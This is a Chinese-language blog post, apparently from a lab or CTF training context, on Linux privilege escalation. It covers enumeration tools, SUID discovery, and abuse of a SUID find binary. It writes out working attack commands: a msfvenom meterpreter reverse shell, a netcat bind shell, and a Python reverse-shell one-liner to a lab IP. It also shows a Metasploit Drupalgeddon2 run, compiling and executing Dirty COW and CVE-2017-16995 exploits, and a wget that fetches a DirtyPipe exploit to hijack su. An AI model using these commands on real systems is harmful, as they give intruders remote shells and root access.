文章介绍了多种用于漏洞扫描和提权的工具和技术,包括LinEnum、traitor、BeRoot、linux-exploit-suggester等。提权过程涉及检查SUID权限、利用GTFOBins和二进制文件,以及针对内核漏洞如CVE-2017-16995和DirtyPipe的利用。此外,还展示了如何通过Nmap进行网络扫描,以及使用Metasploit进行Drupal框架的远程溢出利用。
一些漏洞扫描项目&探针&提权命令查询
综合类探针:
自动化提权:
GitHub - AlessandroZ/BeRoot: Privilege Escalation Project - Windows / Linux / Mac
信息收集:
GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
漏洞探针:
GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool
GitHub - jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester
二进制文件提权命令查询平台:
Linux:GTFOBins
Windows:LOLBAS
配置安全SUID提权-探针&利用-云服务器
漏洞成因:chmod u+s给予了suid u-s删除了suid
使程序在运行中受到了suid root权限的执行过程导致
提权过程:探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG
手工命令探针安全:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;脚本项目探针安全:
LinEnum.sh traitor linuxprivchecker 检测可能存在SUID利用
参考利用:
SUID Executables – Penetration Testing Lab 提供可用命令参数 是否能给我们提供提权途径
Nmap Vim find Bash More Less Nano cp
这里利用find命令 管理员为了文件查找的结果更多,赋予了fin查找程序suid root权限
并且 find命令可以使用参数与其他命令进行结合使用
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.146 LPORT=4444 -f elf > mshell.elf
use exploit/multi/handler #使用监听模块
set payload linux/x64/meterpreter/reverse_tcp #使用和木马相同的payload
哥斯拉运行mshell.elf后门 上线
touch whgojp
find whgojp -exec whoami \;
利用NC反弹:注:linux下nc版本默认低版本 没有-e参数
find whgojp -exec netcat -lvp 5555 -e /bin/sh \;
netcat xx.xx.xx.xx 5555
利用Python反弹:linux自带python环境
find whgojp -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.146",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;
nc -lvp 7777
使用nc监听7777端口
成功使用suid提权至root权限
内核漏洞本地用户提权-探针&利用-Mozhe
提权过程:连接-获取可利用漏洞-下载或上传EXP-编译EXP-给权限执行-GG
探针项目:BeRoot linux-exploit-suggester linux-exploit-suggester2
ssh连接本地低权限用户
上传漏洞探针脚本,赋予执行权限
$ ./les.sh
$ ./linux-exploit-suggester-2.pl
cve-2017-16995漏洞利用
gcc cve-2017-16995 -o cve-2017-16995
chmod +x cve-2017-16995
./cve-2017-16995
id
内核漏洞Web用户提权-探针&利用-脏牛dcow
nmap 扫描到靶机地址以及对应开放服务 根据页面识别为Drupal框架
nmap 10.10.10.0/24
nmap -p1-65535 10.10.10.148
使用msf进行溢出利用
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 10.10.10.148
set rport 1898
run
内核提权整个过程:(linux-exploit-suggester获取信息哦)
vulnhub靶机-探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权-GG
上传les.sh 进行漏洞探测
内核漏洞提权过程:寻可用-下exp-上/tmp-编译exp-执行(无权限用chmod)
当然其中也包括了脏牛漏洞以及漏洞利用exp
upload /root/dcow.cpp /tmp/dcow.cpp
cd /tmp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
./dcow
su root
成功拿到靶机
内核漏洞本地用户提权-探针&利用-DirtyPipe
Dirty Pipe(CVE-2022-0847)
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102
wget https://haxx.in/files/dirtypipez.c --no-check-certificate
gcc -o dirtypipez dirtypipez.c
./dirtypipez /usr/bin/su #任何具体suid权限的文件均可
id
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
